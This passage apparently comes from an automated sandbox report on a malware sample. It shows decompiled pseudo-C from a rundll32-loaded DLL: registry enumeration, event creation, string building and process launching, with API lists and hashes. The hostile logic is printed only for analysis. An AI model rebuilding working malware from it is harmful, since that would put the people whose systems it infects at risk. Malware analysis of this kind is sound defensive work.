                                                          								_t34 = _t68 + 0x36dba47; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							_t70 = E036D62F6(_t69,  *0x36da3d4,  *0x36da3d8,  &_a24,  &_a16); // executed
                                                          							if(_t70 == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0x36da348; // 0x228d5a8
                                                          									_t44 = _t71 + 0x36db842; // 0x74666f53
                                                          									_t73 = E036D61FC(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d036d90
                                                          										E036D74B6( *_t47, _t91, _a8,  *0x36da3d8, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d036d90
                                                          										E036D74B6( *_t49, _t91, _t99,  *0x36da3d0, _a16);
                                                          										E036D6C2C(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d036d90, executed
                                                          									E036D74B6( *_t40, _t91, _a8,  *0x36da3d8, _a24); // executed
                                                          									_t43 = _t101 + 0x10; // 0x3d036d90
                                                          									E036D74B6( *_t43, _t91, _a8,  *0x36da3d0, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E036D6C2C(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d036d90, executed
                                                          					_t81 = E036D12CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d036d90
                                                          							E036D4822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E036D6C2C(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E036D6C2C(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E036D7A1E(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0x36da3dc);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(036D7168,0000005F,00000000,00000000,00000104), ref: 036D34A5
                                                          • lstrcpy.KERNEL32(?,?), ref: 036D34D2
                                                            • Part of subcall function 036D61FC: lstrlen.KERNEL32(?,00000000,05969D70,00000000,036D39E8,05969F93,69B25F44,?,?,?,?,69B25F44,00000005,036DA00C,4D283A53,?), ref: 036D6203
                                                            • Part of subcall function 036D61FC: mbstowcs.NTDLL ref: 036D622C
                                                            • Part of subcall function 036D61FC: memset.NTDLL ref: 036D623E
                                                            • Part of subcall function 036D74B6: lstrlenW.KERNEL32(?,?,?,036D363B,3D036D90,80000002,036D7168,036D7283,74666F53,4D4C4B48,036D7283,?,3D036D90,80000002,036D7168,?), ref: 036D74DB
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 036D34F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: f7a40a22e11d38c4f2055b102c47e50df9e2b44fe5dfdbc745009161b62915aa
                                                          • Instruction ID: 7bf7aada2fdb45ae70748664c5b6c2554cb8374fec908c5471e0d3987dd66b1d
                                                          • Opcode Fuzzy Hash: f7a40a22e11d38c4f2055b102c47e50df9e2b44fe5dfdbc745009161b62915aa
                                                          • Instruction Fuzzy Hash: 96517D7AD00209EFCF22EFA0DD40EAA7BBAEF08340F158518F9159A364D735D925EB15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0628ED35
                                                          • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0628EDBF
                                                          • WaitForSingleObject.KERNEL32(00000064), ref: 0628EDCD
                                                          • SuspendThread.KERNEL32(?), ref: 0628EDE0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                          • String ID: v
                                                          • API String ID: 3168247402-1801730948
                                                          • Opcode ID: d776bc79af66495a5a285be447e54e12ebc1029a88a8aae178c165f284520a5c
                                                          • Instruction ID: 02da399db4cb234abaf3169dc1f739d42803fc305e36c7625a31f554200f454a
                                                          • Opcode Fuzzy Hash: d776bc79af66495a5a285be447e54e12ebc1029a88a8aae178c165f284520a5c
                                                          • Instruction Fuzzy Hash: F5417B71515302AFE7A1EF50CC4096BBBEAFF88710F04492DFAD4921A0D732D914CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D71B6(void* __ecx, intOrPtr _a4) {
                                                          				int* _v8;
                                                          				int _v12;
                                                          				int* _v16;
                                                          				int _v20;
                                                          				int* _v24;
                                                          				char* _v28;
                                                          				void* _v32;
                                                          				long _t33;
                                                          				char* _t35;
                                                          				long _t39;
                                                          				long _t42;
                                                          				intOrPtr _t47;
                                                          				void* _t51;
                                                          				long _t53;
                                                          
                                                          				_t51 = __ecx;
                                                          				_v8 = 0;
                                                          				_v16 = 0;
                                                          				_v12 = 0;
                                                          				_v24 = 0;
                                                          				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                                                          				_t53 = _t33;
                                                          				if(_t53 != 0) {
                                                          					L18:
                                                          					return _t53;
                                                          				}
                                                          				_t53 = 8;
                                                          				_t35 = E036D6D63(0x104);
                                                          				_v28 = _t35;
                                                          				if(_t35 == 0) {
                                                          					L17:
                                                          					RegCloseKey(_v32); // executed
                                                          					goto L18;
                                                          				}
                                                          				_v20 = 0x104;
                                                          				do {
                                                          					_v16 = _v20;
                                                          					_v12 = 0x104;
                                                          					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                                                          					_t53 = _t39;
                                                          					if(_t53 != 0xea) {
                                                          						if(_t53 != 0) {
                                                          							L14:
                                                          							if(_t53 == 0x103) {
                                                          								_t53 = 0;
                                                          							}
                                                          							L16:
                                                          							E036D6C2C(_v28);
                                                          							goto L17;
                                                          						}
                                                          						_t42 = E036D3472(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                                                          						_t53 = _t42;
                                                          						if(_t53 != 0) {
                                                          							goto L14;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					if(_v12 <= 0x104) {
                                                          						if(_v16 <= _v20) {
                                                          							goto L16;
                                                          						}
                                                          						E036D6C2C(_v24);
                                                          						_v20 = _v16;
                                                          						_t47 = E036D6D63(_v16);
                                                          						_v24 = _t47;
                                                          						if(_t47 != 0) {
                                                          							L6:
                                                          							_t53 = 0;
                                                          							goto L12;
                                                          						}
                                                          						_t53 = 8;
                                                          						goto L16;
                                                          					}
                                                          					_v8 = _v8 + 1;
                                                          					goto L6;
                                                          					L12:
                                                          				} while (WaitForSingleObject( *0x36da30c, 0) == 0x102);
                                                          				goto L16;
                                                          			}

                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,036D7168,?), ref: 036D71DC
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • RegEnumKeyExA.KERNEL32(?,?,?,036D7168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,036D7168), ref: 036D7223
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,036D7168,?,036D7168,?,?,?,?,?,036D7168,?), ref: 036D7290
                                                          • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,036D7168,?), ref: 036D72B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                          • String ID: !s
                                                          • API String ID: 3664505660-1801701826
                                                          • Opcode ID: db61a68dea8f2d759619cfbe215cb03abdcdd9cf3e4576071315693e5e3eb339
                                                          • Instruction ID: b854e807d2184e84350f9ea3c498b6e02507be65039db9bcd2ad65f0feca427f
                                                          • Opcode Fuzzy Hash: db61a68dea8f2d759619cfbe215cb03abdcdd9cf3e4576071315693e5e3eb339
                                                          • Instruction Fuzzy Hash: 6B314776C00259ABCF22EFA5ED84DEEFFB9EB88710F14406AF911B6254D2710A50CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E036D3D2C(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				CHAR* _v16;
                                                          				long _v20;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t21;
                                                          				CHAR* _t22;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t26;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				CHAR* _t36;
                                                          				CHAR* _t42;
                                                          				CHAR* _t43;
                                                          				CHAR* _t44;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				signed char _t56;
                                                          				intOrPtr _t58;
                                                          				signed int _t59;
                                                          				void* _t63;
                                                          				CHAR* _t67;
                                                          				CHAR* _t68;
                                                          				char* _t69;
                                                          				void* _t70;
                                                          
                                                          				_t61 = __edx;
                                                          				_v20 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t21 = E036D3CFD();
                                                          				if(_t21 != 0) {
                                                          					_t59 =  *0x36da2fc; // 0x4000000a
                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                          					 *0x36da2fc = (_t59 & 0xf0000000) + _t21;
                                                          				}
                                                          				_t22 =  *0x36da178(0, 2); // executed
                                                          				_v16 = _t22;
                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                          					_t25 = E036D389E( &_v8,  &_v20); // executed
                                                          					_t54 = _t25;
                                                          					_t26 =  *0x36da348; // 0x228d5a8
                                                          					if( *0x36da2fc > 5) {
                                                          						_t8 = _t26 + 0x36db5c5; // 0x4d283a53
                                                          						_t27 = _t8;
                                                          					} else {
                                                          						_t7 = _t26 + 0x36db9fd; // 0x44283a44
                                                          						_t27 = _t7;
                                                          					}
                                                          					E036D6B80(_t27, _t27);
                                                          					_t31 = E036D76BB(_t61,  &_v20,  &_v12); // executed
                                                          					if(_t31 == 0) {
                                                          						CloseHandle(_v20);
                                                          					}
                                                          					_t63 = 5;
                                                          					if(_t54 != _t63) {
                                                          						 *0x36da310 =  *0x36da310 ^ 0x81bbe65d;
                                                          						_t32 = E036D6D63(0x60);
                                                          						 *0x36da3cc = _t32;
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							_push(8);
                                                          							_pop(0);
                                                          						} else {
                                                          							memset(_t32, 0, 0x60);
                                                          							_t49 =  *0x36da3cc; // 0x59695b0
                                                          							_t70 = _t70 + 0xc;
                                                          							__imp__(_t49 + 0x40);
                                                          							_t51 =  *0x36da3cc; // 0x59695b0
                                                          							 *_t51 = 0x36db827;
                                                          						}
                                                          						_t54 = 0;
                                                          						__eflags = 0;
                                                          						if(0 == 0) {
                                                          							_t36 = RtlAllocateHeap( *0x36da2d8, 0, 0x43);
                                                          							 *0x36da368 = _t36;
                                                          							__eflags = _t36;
                                                          							if(_t36 == 0) {
                                                          								_push(8);
                                                          								_pop(0);
                                                          							} else {
                                                          								_t56 =  *0x36da2fc; // 0x4000000a
                                                          								_t61 = _t56 & 0x000000ff;
                                                          								_t58 =  *0x36da348; // 0x228d5a8
                                                          								_t13 = _t58 + 0x36db552; // 0x697a6f4d
                                                          								_t55 = _t13;
                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x36d9287);
                                                          							}
                                                          							_t54 = 0;
                                                          							__eflags = 0;
                                                          							if(0 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E036D3365( ~_v8 &  *0x36da310, 0x36da00c); // executed
                                                          								_t42 = E036D1645(0, _t55, _t63, 0x36da00c); // executed
                                                          								_t54 = _t42;
                                                          								__eflags = _t54;
                                                          								if(_t54 != 0) {
                                                          									goto L30;
                                                          								}
                                                          								_t43 = E036D3981(); // executed
                                                          								__eflags = _t43;
                                                          								if(_t43 != 0) {
                                                          									__eflags = _v8;
                                                          									_t67 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L29:
                                                          										_t44 = E036D661D(_t61, _t67, _v8); // executed
                                                          										_t54 = _t44;
                                                          										goto L30;
                                                          									}
                                                          									__eflags = _t67;
                                                          									if(__eflags == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t54 = E036D529C(__eflags,  &(_t67[4]));
                                                          									__eflags = _t54;
                                                          									if(_t54 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L29;
                                                          								}
                                                          								_t54 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t68 = _v12;
                                                          						if(_t68 == 0) {
                                                          							L30:
                                                          							if(_v16 == 0 || _v16 == 1) {
                                                          								 *0x36da17c(); // executed
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t69 =  &(_t68[4]);
                                                          						do {
                                                          						} while (E036D7928(_t63, _t69, 0, 1) == 0x4c7);
                                                          					}
                                                          					goto L30;
                                                          				} else {
                                                          					_t54 = _t22;
                                                          					L34:
                                                          					return _t54;
                                                          				}
                                                          			}

                                                          0x036d3d2c
                                                          0x036d3d36
                                                          0x036d3d39
                                                          0x036d3d3c
                                                          0x036d3d3f
                                                          0x036d3d46
                                                          0x036d3d48
                                                          0x036d3d54
                                                          0x036d3d56
                                                          0x036d3d56
                                                          0x036d3d5f
                                                          0x036d3d65
                                                          0x036d3d6a
                                                          0x036d3d84
                                                          0x036d3d90
                                                          0x036d3d92
                                                          0x036d3d97
                                                          0x036d3da1
                                                          0x036d3da1
                                                          0x036d3d99
                                                          0x036d3d99
                                                          0x036d3d99
                                                          0x036d3d99
                                                          0x036d3da8
                                                          0x036d3db5
                                                          0x036d3dbc
                                                          0x036d3dc1
                                                          0x036d3dc1
                                                          0x036d3dca
                                                          0x036d3dcd
                                                          0x036d3df3
                                                          0x036d3dff
                                                          0x036d3e04
                                                          0x036d3e09
                                                          0x036d3e0b
                                                          0x036d3e37
                                                          0x036d3e39
                                                          0x036d3e0d
                                                          0x036d3e11
                                                          0x036d3e16
                                                          0x036d3e1b
                                                          0x036d3e22
                                                          0x036d3e28
                                                          0x036d3e2d
                                                          0x036d3e33
                                                          0x036d3e3a
                                                          0x036d3e3c
                                                          0x036d3e3e
                                                          0x036d3e4d
                                                          0x036d3e53
                                                          0x036d3e58
                                                          0x036d3e5a
                                                          0x036d3e8a
                                                          0x036d3e8c
                                                          0x036d3e5c
                                                          0x036d3e5c
                                                          0x036d3e62
                                                          0x036d3e6f
                                                          0x036d3e75
                                                          0x036d3e75
                                                          0x036d3e7d
                                                          0x036d3e86
                                                          0x036d3e8d
                                                          0x036d3e8f
                                                          0x036d3e91
                                                          0x036d3e98
                                                          0x036d3ea5
                                                          0x036d3eaa
                                                          0x036d3eaf
                                                          0x036d3eb1
                                                          0x036d3eb3
                                                          0x00000000
                                                          0x00000000
                                                          0x036d3eb5
                                                          0x036d3eba
                                                          0x036d3ebc
                                                          0x036d3ec3
                                                          0x036d3ec7
                                                          0x036d3eca
                                                          0x036d3edf
                                                          0x036d3ee3
                                                          0x036d3ee8
                                                          0x00000000
                                                          0x036d3ee8
                                                          0x036d3ecc
                                                          0x036d3ece
                                                          0x00000000
                                                          0x00000000
                                                          0x036d3ed9
                                                          0x036d3edb
                                                          0x036d3edd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d3edd
                                                          0x036d3ec0
                                                          0x036d3ec0
                                                          0x036d3e91
                                                          0x036d3dcf
                                                          0x036d3dcf
                                                          0x036d3dd4
                                                          0x036d3eea
                                                          0x036d3eef
                                                          0x036d3ef7
                                                          0x036d3ef7
                                                          0x00000000
                                                          0x036d3eef
                                                          0x036d3dda
                                                          0x036d3ddd
                                                          0x036d3de7
                                                          0x036d3dee
                                                          0x00000000
                                                          0x036d3eff
                                                          0x036d3eff
                                                          0x036d3f02
                                                          0x036d3f06
                                                          0x036d3f06

                                                          APIs
                                                            • Part of subcall function 036D3CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,036D3D44,00000001), ref: 036D3D0C
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 036D3DC1
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • memset.NTDLL ref: 036D3E11
                                                          • RtlInitializeCriticalSection.NTDLL(05969570), ref: 036D3E22
                                                            • Part of subcall function 036D529C: memset.NTDLL ref: 036D52B6
                                                            • Part of subcall function 036D529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 036D52FC
                                                            • Part of subcall function 036D529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 036D5307
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 036D3E4D
                                                          • wsprintfA.USER32 ref: 036D3E7D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: 5b226d54084299a65ece264d49762c3c9ee2ecae0d2315f0626b2b4d438ee74f
                                                          • Instruction ID: 2528ed164ca509ea2f12bef57be957ffeb7e296f5f65a6895b349c253ce10f9b
                                                          • Opcode Fuzzy Hash: 5b226d54084299a65ece264d49762c3c9ee2ecae0d2315f0626b2b4d438ee74f
                                                          • Instruction Fuzzy Hash: E8511779E05324ABDB10FFE5DD84F6E77B8AB08700F28045AE502EB38CE77195508B96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			E036D19E2(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;
                                                          				_t122 = (_t102 >> 2) + 1;
                                                          				_v8 = 0;
                                                          				_a8 = 0;
                                                          				_t81 = E036D6D63(_t122 << 2);
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;
                                                          				_t113 = 0;
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {
                                                          							L21:
                                                          							if(_a8 <= 0x20) {
                                                          								_push(0xb);
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E036D6C2C(_v16);
                                                          								goto L37;
                                                          							}
                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                          							_t103 = E036D6D63((_v8 + _t24) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;
                                                          							_a4 = _a4 & 0x00000000;
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t124 = _t103 + _t90 * 4;
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0x36da318 = _t103;
                                                          								goto L35;
                                                          							}
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                          								__imp__(_t124);
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}

                                                          Address column of the C listing above: 0x036d19e9 to 0x036d1b6c

                                                          APIs
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 036D1ADF
                                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 036D1AF4
                                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 036D1B0B
                                                          • lstrlen.KERNEL32(69B25F45), ref: 036D1B2F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 8a311da38ea68ad8a822d357c8069c3c106e3867ce68e0b5803a453c09224850
                                                          • Instruction ID: 6b01027e5985df012bdd9abe6c60572d23eb4e619e1ab2b9367c33f27d45eed1
                                                          • Opcode Fuzzy Hash: 8a311da38ea68ad8a822d357c8069c3c106e3867ce68e0b5803a453c09224850
                                                          • Instruction Fuzzy Hash: 9E519031E00208EFDB61CF99C6846ADFBB6FF46315F19805AE819AB305D7B09A51CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D498E(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				long _t14;
                                                          				void* _t18;
                                                          				WCHAR* _t19;
                                                          				long _t20;
                                                          				void* _t25;
                                                          				signed int* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				WCHAR** _t32;
                                                          
                                                          				_t6 =  *0x36da310; // 0xd448b889
                                                          				_t32 = _a4;
                                                          				_a4 = _t6 ^ 0x109a6410;
                                                          				_t8 =  *0x36da348; // 0x228d5a8
                                                          				_t3 = _t8 + 0x36db87a; // 0x61636f4c = "Loca" as little-endian ASCII; E036D11C3 turns it into the event name (lstrlen/lstrcpy/lstrcat in the APIs list)
                                                          				_t25 = 0;
                                                          				_t30 = E036D11C3(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0x36da34c, 1, 0, _t30); // attributes at 0x36da34c, manual-reset, initially non-signalled, named by _t30
                                                          					E036D6C2C(_t30); // frees the name buffer (RtlFreeHeap in the subcall list)
                                                          				}
                                                          				_t12 =  *0x36da2fc; // 0x4000000a
                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) { // "_t12 >= 2" is redundant next to "_t12 == 6" (decompiler artefact)
                                                          					L12:
                                                          					_t28 = _a8;
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                          					}
                                                          					_t14 = E036D402A(_t32, 0); // executed
                                                          					_t31 = _t14;
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20); // 0x4e20 = 20000 ms
                                                          					}
                                                          					if(_t28 != 0 && _t31 != 0) {
                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                          					}
                                                          					goto L20;
                                                          				} else {
                                                          					_t18 = E036D68BD(); // executed
                                                          					if(_t18 != 0) {
                                                          						goto L12;
                                                          					}
                                                          					_t19 = StrChrW( *_t32, 0x20); // first space in the wide string
                                                          					if(_t19 != 0) {
                                                          						 *_t19 = 0; // split in place: *_t32 keeps the first token, _t19 points at the remainder
                                                          						_t19 =  &(_t19[1]);
                                                          					}
                                                          					_t20 = E036D7928(0,  *_t32, _t19, 0); // executed
                                                          					_t31 = _t20;
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							L22:
                                                          							return _t31;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20); // 0x4e20 = 20000 ms
                                                          						if(_t31 == 0) {
                                                          							L20:
                                                          							if(_t25 != 0) {
